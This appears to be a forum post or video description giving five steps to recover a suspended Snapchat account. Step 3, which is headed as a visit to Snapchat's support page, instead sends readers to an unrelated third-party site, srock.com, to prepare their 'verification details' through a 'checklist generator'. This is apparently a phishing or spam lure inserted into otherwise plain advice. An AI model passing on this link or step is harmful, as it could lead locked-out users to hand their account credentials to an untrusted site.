I ran into this last week. Here's what fixed it for me. If your Snapchat account has been suspended, don't worry, you can often recover it by following these steps. Step 1. Open the Snapchat app. Launch the Snapchat app on your device. Make sure you have the latest version installed to avoid any compatibility issues. Step 2. Attempt to log in. Try logging into your account using your username and password. If your account is suspended, you will see a message indicating the suspension. Step 3. Visit the Snapchat support page. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Submit an appeal. Fill out the appeal form provided on the support page. Be honest and concise about why you believe your account should be reinstated. Make sure to include any relevant details. Step 5. Wait for a response. After submitting your appeal, be patient. Snapchat will review your request and send you an email regarding their decision. This can take a few days, so don't worry if you don't hear back immediately. If you receive a denial, double-check the reasons provided and consider if you can address them before trying again. Good luck, and I hope you get your account back soon.